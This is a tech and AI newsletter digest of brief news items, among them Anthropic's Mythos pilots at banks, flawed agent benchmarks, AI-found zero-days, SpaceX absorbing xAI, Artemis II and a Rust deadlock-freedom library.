Tech & AI Daily
Goldman Sachs, Citi, and others are piloting Anthropic's Mythos internally, with JPMorgan named specifically in Project Glasswing. Separately, Claude pricing changes last week apparently triggered a ban affecting OpenClaw users, which needs immediate attention.
RDI Berkeley found that leading agent benchmarks have been systematically gamed or are fundamentally flawed, casting serious doubt on how we measure agentic AI progress. If your agent stack is tuned against these numbers, real-world performance is probably not what you think.
Cirrus Labs, known for its CI/CD and cross-platform infrastructure tooling, is being absorbed by OpenAI. This signals OpenAI is building serious developer infrastructure muscle, not just model capabilities.
Meta's internal Avocado series kicks off with Muse Spark, the first model from its high-budget superintelligence research group, available only on Meta AI for now. We can't benchmark it independently yet, but the fact that this team is shipping at all is the real headline.
The post-Mythos story is that smaller, cheaper models found the same zero-days that Anthropic's flagship did, completely reframing the threat model from 'only frontier AI is dangerous' to 'this capability is already commoditized.' The defensive implications for agentic systems are serious and underappreciated right now. Anyone building tool-using agents needs to be thinking about what happens when an adversarially prompted sub-agent has access to a shell.
Q1's blockbuster: SpaceX absorbed Elon Musk's own AI company xAI at a $1.25 trillion valuation, which if accurate would be the largest acquisition ever. Vertical consolidation of orbital infrastructure plus frontier AI is a very specific power concentration worth keeping an eye on.
NASA's Artemis II lunar flyby mission returned safely, the first crewed deep-space mission since Apollo. Not a builder story, but it is the kind of thing worth pausing for.
South Korea is guaranteeing a baseline level of mobile data access to all citizens by law, a policy move that most Western governments would not touch. Interesting global precedent for digital rights and what connectivity-as-infrastructure looks like in practice.
Researchers demonstrated data storage at 447 TB per square centimeter with zero retention energy on a fluorographane substrate. Years from practical use, but the density numbers are genuinely staggering and the underlying physics is new.
Surelock enforces deadlock freedom at compile time using Rust's type system, which is exactly the kind of thing that should already exist in the stdlib. If you're writing concurrent Rust and tired of reasoning about lock ordering manually, this is worth a look.
Subscribe and get Tech & AI Daily delivered to your inbox every morning.